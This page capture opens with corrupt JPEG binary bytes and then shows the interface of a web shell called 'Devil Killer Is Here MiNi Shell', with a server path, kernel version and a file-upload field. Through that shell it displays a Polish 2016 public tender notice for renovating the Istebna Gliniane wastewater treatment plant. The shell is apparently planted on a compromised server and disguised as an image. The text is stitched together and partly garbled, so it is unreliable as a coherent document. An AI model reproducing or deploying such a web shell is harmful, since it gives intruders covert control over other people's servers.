JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/92082-N-2016.html

<p class="kh_header"><b>Istebna: Przebudowa oczyszczalni ścieków Istebna Gliniane - etap II, remont reaktora biologicznego BOS nr 2</b><br>
<b>Numer ogłoszenia: 92082 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Istebnej , Istebna 1000, 43-470 Istebna, woj. śląskie, tel. 033 8556500 w. 39.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.istebna.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa oczyszczalni ścieków Istebna Gliniane - etap II, remont reaktora biologicznego BOS nr 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia polega na wykonaniu robót budowlanych pn: Przebudowa oczyszczalni ścieków Gliniane w Istebnej - etap II, remont reaktora biologicznego BOS 2
2. Zakres robót do wykonania w etapie II: 
Demontaż istniejących instalacji i urządzeń dla etapu II:
- Instalacje do demontażu w pompowni ścieków mechanicznie oczyszczonych:
- rurociąg stalowy dn100 w ilości około 18 m, 
- zasuwy stalowe kołnierzowe dn100 - 3 sztuki, 
- zawory zwrotne dn100 - 2 sztuki,
- belka wciągnika ręcznego, dwuteownik 200, długości około - 3,5 m, 
- instalacje elektryczne oświetleniowe i zasilające urządzenia.
 - Instalacje do demontażu w reaktorze BOS nr 2
- demontaż stalowego rurociągu sprężonego powietrza Dn 80, o długości około - 15 m, 
- demontaż stalowych rurociągów recyrkulacji osadu Dn 80, o długości około 12,0 m,  
- demontaż mieszadła zatapialnego w reaktorze - szt. 1, 
- demontaż rusztów napowietrzających i dyfuzorów w komorze napowietrzania - 1 komplet, 
- demontaż rusztów napowietrzających w komorze stabilizacji osadu - 1 komplet,
- demontaż stalowego wyposażenia osadnika wtórnego (rurociągi, koryta, rura centralna), 
- demontaż pompy mamutowej do recyrkulacji osadu - szt. 1,
- demontaż stalowych 2 pomostów i  barierek na pomostach, 
- demontaż instalacji elektrycznej zasilającej istniejące urządzenia mechaniczne dla BOS nr2. 
3. Projektowany montaż urządzeń technologicznych w pompowni ścieków: 
3.1. Instalacja pomp zatapialnych PS.1, PS.2:
W istniejących lukach montażowych zainstalowane zostaną 2 nowe pompy zatapialne. Z uwagi na trudny dostęp do komory czerpnej pompowni pompy przyłączone będą za pomocą demontowalnych elastycznych przewodów  tłocznych do instalacji  przetłaczającej ścieki do reaktorów biologicznych. Pompy wolno stojące ustawione będą na dnie zbiornika czerpnego na własnych konstrukcjach wsporczych nie przytwierdzanych do dna zbiornika. Dobrano pompy z wirnikiem kanałowym z mechanizmem tnącym z wolframowymi ostrzami łopatek wirnika.
- parametry techniczne pomp  ściekowych:
- wydajność 1 pompy : Qp1 max = 25,0  m3/h,
- moc silnika min. 2,2 kW  (silnik trójfazowy), 
- pompy przystosowane są  do współpracy z falownikiem, 
3.2. Instalacja mieszadła zatapialnego M.3:
W istniejącym luku montażowym PK.3 zainstalowane zostanie mieszadło zatapialne. Instalacja mieszadła jest konieczna ze względu na dużą powierzchnię dna komory czerpnej pompowni. Okresowa praca mieszadła  przeciwdziałać będzie odkładaniu się na dnie komory czerpnej  pompowni  drobnych zawiesin. Dobrano mieszadło o mocy silnika min. 1,9kW. 
3.3. Rurociąg tłoczny ścieków:  
Projektuje się instalację nowych pionowych odcinków  rurociągu tłocznego ścieków D110 PE, PN10 w tym;
- 2 odcinki rurociągu elastycznego do połączenia kołnierzowego o długości L1=3,0m, 
- odcinki rurociągu  110PE o długości L1 = 2,85m.
Kołnierze do połączenia rurociągu elastycznego z rurociągiem sztywnym wykonać ze stali nierdzewnej OH18N9.
Na pionowych odcinkach rurociągu tłocznego zainstalować 2 zawory zwrotne kulowe Dn100 oraz 2 zasuwy odcinające Dn100. 
3.4. Pokrywy luków montażowych
Dla wszystkich otworów montażowych należy wykonać obramowania z kątowników ze stali nierdzewnej. Obramowania zlicowane z poziomem posadzki z płytek ceramicznych. Luki montażowe pomp przykryte pokrywami dwudzielnymi na zawiasach. W pokrywach należy wyciąć otwory na rurociągi tłoczne. Pokrywy wykonane z blachy stalowej ryflowanej o grubości min. 5mm ze stali OH18N9. Każde otwierane skrzydło otworu montażowego pomp KP.1, KP.2 wyposażone w stopery i ruchome opadające uchwyty. Pokrywa luku dla mieszadła M.3 wykonana z blachy ryflowanej o grubości min. 5mm. Pokrywa na zawiasach jednoskrzydłowa otwierana w kierunku na ścianę bez stopera. Uchwyt  pokrywy ruchomy opadający.
3.5. Instalacja żurawika
W pompowni ścieków należy zainstalować 1 żurawik obrotowy naścienny do montażu pomp i mieszadła. Żurawik zainstalowany na stałe przy lokach montażowych pomp. Do obsługi mieszadła należy na ścianie zainstalować dodatkowe gniazdo umożliwiające instalację żurawika od pomp. System zawiesia żurawika rozłączny umożliwiający przenoszenie żurawika bez potrzeby wyciągania pomp. Żurawik obrotowy o kącie obrotu 1800. Udźwig min. 150kg. Wykonanie stal nierdzewna OH18N9. 
4. Projektowany montaż urządzeń technologicznych w reaktorze BOS nr 2: 
Istniejący reaktor typu BOS zaprojektowano i wykonano z możliwością do prowadzenia procesów biologicznego usuwania związków węgla, i fosforu.  W ramach remontu  I modernizacji reaktora  projektuje się wydzielenie dwóch stref osadu czynnego w tym strefy beztlenowej stanowiącej komorę kontaktową z biologiczną defosfatacją oraz strefę tlenową do biologicznego usuwania związków węgla i nitryfikacji. Jednocześnie wprowadza się rozwiązania zmieniające proporcje wielkościowe poszczególnych stref zintegrowanego oczyszczania biologicznego ścieków, oraz wprowadzony zostanie układ cyrkulacyjnego przepływu ścieków poprzez zastosowanie mieszadła pompującego w strefie nitryfikacji.
- Instalacja napowietrzania ścieków: 
W związku z projektowanym rozszerzeniem stref tlenowych w obu reaktorze BOS instalacja napowietrzania ścieków dostosowana będzie do wymaganych parametrów technologicznych oraz do wymiarów istniejącego zbiornika. 
- Projektowana  instalacja dla  reaktora BOS składa się z elementów:
- 2 piony Dn100 z zaworami kulowymi Dn100;
- 52 dyfuzory rurowe analogiczne jak zastosowano dla reaktora BOS nr1,   
- rurociąg sprężonego powietrza ze stacji dmuchaw do reaktora BOS nr 2
5. Ogólne prace remontowe: 
- Pompownia ścieków:  
- ułożenie płytek ceramicznych typu gres na posadzce pompowni . Płytki antypoślizgowe, podłogowe w ilości około 5,00 m2,
- ułożenie płytek ceramicznych szkliwionych ściennych na ścianach pompowni do wysokości 2m w ilości - około 21 m2, 
- malowanie dwukrotne powierzchni sufitu pomieszczenia pompowni. Farba wodoodporna. Powierzchnia   sufitu około 5,0m2,
- malowanie dwukrotne powierzchni ścian pomieszczenia pompowni powyżej płytek ceramicznych. Farba wodoodporna. Powierzchnia ścian około 25,0m2,
- wymiana drzwi zewnętrznych bez  naruszania nadproża. Drzwi jednoskrzydłowe o wymiarach  90 x 200 cm. Wykonanie aluminiowe ocieplane. Kolor np. brązowy, 
- instalacja króćca do wody na ścianie wewnętrznej pompowni, na istniejącym przyłączu wody z końcówką dla węża D25PE. 
6. Reaktor BOS nr 2: 
- instalacja 2 nowych pomostów na koronie zbiornika w miejsce zdemontowanych istniejących pomostów.
- piaskowanie wszystkich wewnętrznych ścian i dna zbiornika reaktora BOS nr 2 Powierzchnia ścian i dna zbiorników do piaskowania: 
- komora napowietrzania w ilości 148,0 m2;
- osadnik wtórny w ilości 48,0 m2, 
- komora kontaktowa (beztlenowa) w ilości 28,0 m2, 
- komora tlenowa stabilizacji osadu w ilości 31,0 m2,
- malowanie ścian wewnętrznych reaktora BOS w ilości 255,0 m2,
- ściany stalowe wewnętrzne pomalować farbami antykorozyjnymi.  
7. Instalacja elektryczna i AKPiA:
7.1. W zakres robót do wykonania instalacji wchodzą:
- ułożenie nowego kabla zasilającego rozdzielnicę RG, 
- zainstalowanie nowej rozdzielnicy RG, z której zasilane i sterowane będą wszystkie urządzenia elektryczne po przebudowie i modernizacji, 
- zainstalowanie nowych tablic obiektowych TG 3 wraz z kablami z których zasilone będą obwody ogólne takie jak: oświetlenie, gniazda, ogrzewanie i wentylacja, 
- zainstalowanie baterii kondensatorów,
- zainstalowanie szafy automatyki SA.
- wykonanie nowych tras i linii zasilających wszystkie urządzenia (dla reaktora BOS2 i pompowni ścieków), w części technologicznej w korytkach, w części socjalnej podtynkowo, 
- wykonanie instalacji uziomów i połączeń wyrównawczych taśmą FeZn 30x4mm, prowadzoną wzdłuż tras linii kablowych,
- odtworzenie instalacji odgromowych dla istniejących obiektów,
- zainstalowanie nowej aparatury pomiarowej. 
7.2. Rodzaje instalacji elektrycznych i AKPiA:
- siłowa, wykonana kablami typu  YDYżo 1kV YKYżo 1kV i NYCWY 1kV (TN-S),
- sterowania, wykonana kablami Y(v)KSLY 1kV,
- pomiarowa, wykonana kablami Y(v)KSLYekwf-P(Nr) 0.3kV,
- uziemiająca i poł. wyrównawcze taśma FeZn30x4mm,
- odgromowa taśma FeZn30x4mm i drut FeZn fi 8mm,
- P.POŻ wykonana kablami ognioodpornymi HDGs 3x1,5.

Warunki ogólne dla zadania
1. Wykonawca zobowiązany jest udzielić gwarancji i rękojmi na roboty objęte zamówieniem minimum - 36 miesięcy,
2. Rozliczenie finansowe należy prowadzić na podstawie kosztorysu powykonawczego, 
3. Inwestor wymaga ciągłego nadzoru na zadaniu przez uprawnionego kierownika budowy, 
4. Koszty związane z kompleksową obsługą geodezyjną (wytyczenie + inwentaryzacja powykonawcza) ponosi Wykonawca. 

3. Szczegółowy zakres robót do wykonania określa dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.11.00-9, 45.40.00.00-1, 45.25.22.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości: 10.000,00 zł. (słownie: dziesięć tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, oświadczenie stanowi załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wskazać, że wykonali roboty w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończyli w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał: co najmniej 1 robotę budowlaną polegającą na budowie, modernizacji, rozbudowie, przebudowie lub remoncie oczyszczalni ścieków o wartości nie mniejszej niż 400.000,00 zł. brutto, oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - załącznik nr 5
Ocena spełnienia warunku zostanie przeprowadzona na podstawie załącznika nr 5 do SIWZ - wykaz najważniejszych robót budowlanych oraz dowodów, że roboty te zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
W przypadku inwestycji, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej kwoty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia inwestycji</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, oświadczenie stanowi załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać że dysponuje lub będzie dysponował wykwalifikowanym personelem, który ma uprawnienia budowlane do kierowania robotami budowlanymi w specjalności: instalacyjnej w zakresie sieci i instalacji wodociągowych i kanalizacyjnych - załącznik nr 6. 
Ocena spełniania warunków zostanie przeprowadzona na podstawie załącznika nr 6 do SIWZ - wykaz osób. 
Wskazane powyżej uprawnienia budowlane muszą być zgodne z ustawą z dnia 7 lipca 1994 r. prawo budowlane (tj. Dz. U. z 2013 r. poz. 1409) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (tj Dz.U Nr 83, poz. 578 z późn. zm.) lub odpowiadającym im ważnym uprawnieniom budowlanym, wydanym na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, z którego pochodzi dana osoba, które w zakresie objętym zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w budownictwie w w/w specjalności</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu, oświadczenie stanowi załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania), 
2) pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej) o ile nie wynika z pozostałych dokumentów dostarczonych przez Wykonawcę. 	
3) pisemne zobowiązanie innych podmiotów, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia, wymagane w  przypadku, gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b  ustawy - załącznik nr 8 do SIWZ;      
4) dowód wniesienia Wadium, 
5) oświadczeniem o tajemnicy przedsiębiorstwa o treści - załącznik nr 9 do SIWZ;
6) kosztorysy ofertowe opracowane metodą kalkulacji uproszczonej zgodnie z Rozporządzeniem Ministra Rozwoju Regionalnego i Budownictwa z dnia 13 lipca 2001 r. w sprawie metod kosztorysowania obiektów i robót budowlanych (Dz.U. Nr 80, poz. 867) - wypełniony przedmiar robót stanowiące załącznik nr 10 do SIWZ;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja i rękojmia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 Ustawy Pzp. Zamawiający dopuszcza możliwość zmiany treści umowy w stosunku do oferty, w następujących przypadkach i na następujących zasadach, za obopólną zgodą stron: 
1. Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
a. konieczność przedłużenia (zmiany) terminu umownego oraz harmonogramu rzeczowo-finansowego z powodu:
- działania siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności,
